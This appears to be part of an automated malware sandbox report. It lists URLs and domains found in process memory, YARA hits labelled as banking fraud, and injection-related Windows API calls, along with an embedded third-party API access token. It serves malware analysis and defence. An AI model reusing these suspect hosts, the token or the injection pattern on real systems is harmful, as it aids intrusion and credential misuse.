Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/cangjingkong/
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/dnjw/
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/gongdilan/
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/guchuanyizhi/
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/1/
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/10/
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/2/
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/3/
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/4/
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/5/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/6/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/7/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/8/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/9/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/julisha/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/lingcunaili/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/mingrihuaqiluo/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/ruocainaiyang/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/shuiyechaoyang/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/shuiyechaoyangh/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/sitemap.xml
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/template/news/news10/css/layout.css
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/xiaotianyou/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/xidaoailiw/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/yasendi/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/youtianzhenxi/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/zuozuomumingxi/
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4502147682.0000000005126000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hasan.cloud
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4502147682.0000000005126000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hasan.cloud/tur7/
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4500346640.00000000039E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://zrinorem-srumimit.sbs/
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://0dyos.com
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: Documents.exe, uFEeKIucsX.exe.0.drString found in binary or memory: https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cs.deviceatlas-cdn.com
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cs.deviceatlas-cdn.com/101dacs.js
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cs.deviceatlas-cdn.com/smartclick
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: systray.exe, 00000011.00000002.4498880450.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: systray.exe, 00000011.00000002.4498880450.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: systray.exe, 00000011.00000002.4498880450.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                    Source: systray.exe, 00000011.00000002.4498880450.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: systray.exe, 00000011.00000002.4498880450.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: systray.exe, 00000011.00000003.2522848607.00000000074C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://my.101domain.com?utm_campaign=parked-page&utm_medium=referral&utm_source=carpentry.club&utm_
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/css/fonts/LatoRegular.woff)
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/css/fonts/LatoRegular.woff2
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/css/fonts/LatoRegular.woff2)
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/css/vendor-1.css?20240925050808
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/101domain-logo.svg
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/com.png
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/google-reviews.svg
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/google_workspace.png
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/icon/101domain.ico
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/park-back.jpg
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/park-back.webp
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/trustpilot.svg
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/js/jquery-3.6.0.min.js?20240925050808
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/js/modernizr-webp.js?20240925050808
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/js/pricing.js?20240925050808
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/brand_services.htm?utm_campaign=parked-page&utm_medium=referral&utm_source
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/country_domain.htm?utm_campaign=parked-page&utm_medium=referral&utm_source
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain-availability-search.htm?utm_campaign=parked-page&utm_medium=referra
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain-registration.htm?utm_campaign=parked-page&utm_medium=referral&utm_s
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain_concierge_service.htm?query=carpentry.club&utm_campaign=parked-page
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain_monitoring_trademark_enforcement_guide.htm
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/external_links.htm
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/gmail_email_aliases.htm
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/google_workspace.htm?utm_campaign=parked-page&utm_medium=referral&utm_sour
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/new_gtld_extensions.htm?utm_campaign=parked-page&utm_medium=referral&utm_s
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/resource_center.htm
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/web_hosting.htm?utm_campaign=parked-page&utm_medium=referral&utm_source=ca
                    Source: Documents.exe, uFEeKIucsX.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.financestrategists.com/founder-spotlight/best-corporate-domain-registrar-independent-101
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005248000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003398000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.losmason.shop/s15n/?QhKxhNP=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY
                    Source: systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ziyuan.baidu.com/image.gif

                    E-Banking Fraud

                    Source: Yara match, File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000011.00000002.4500125760.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000011.00000002.4498734635.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000011.00000002.4500198635.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000012.00000002.4502147682.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000009.00000002.2340363739.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000009.00000002.2342055723.00000000019E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    Source: initial sampleStatic PE information: Filename: Documents.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0042C7C3 NtClose,9_2_0042C7C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522B60 NtClose,LdrInitializeThunk,9_2_01522B60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01522DF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01522C70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015235C0 NtCreateMutant,LdrInitializeThunk,9_2_015235C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01524340 NtSetContextThread,9_2_01524340
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01524650 NtSuspendThread,9_2_01524650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522BF0 NtAllocateVirtualMemory,9_2_01522BF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522BE0 NtQueryValueKey,9_2_01522BE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522B80 NtQueryInformationFile,9_2_01522B80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522BA0 NtEnumerateValueKey,9_2_01522BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522AD0 NtReadFile,9_2_01522AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522AF0 NtWriteFile,9_2_01522AF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522AB0 NtWaitForSingleObject,9_2_01522AB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522D10 NtMapViewOfSection,9_2_01522D10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522D00 NtSetInformationFile,9_2_01522D00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522D30 NtUnmapViewOfSection,9_2_01522D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522DD0 NtDelayExecution,9_2_01522DD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522DB0 NtEnumerateKey,9_2_01522DB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522C60 NtCreateKey,9_2_01522C60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522C00 NtQueryInformationProcess,9_2_01522C00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522CC0 NtQueryVirtualMemory,9_2_01522CC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522CF0 NtOpenProcess,9_2_01522CF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522CA0 NtQueryInformationToken,9_2_01522CA0
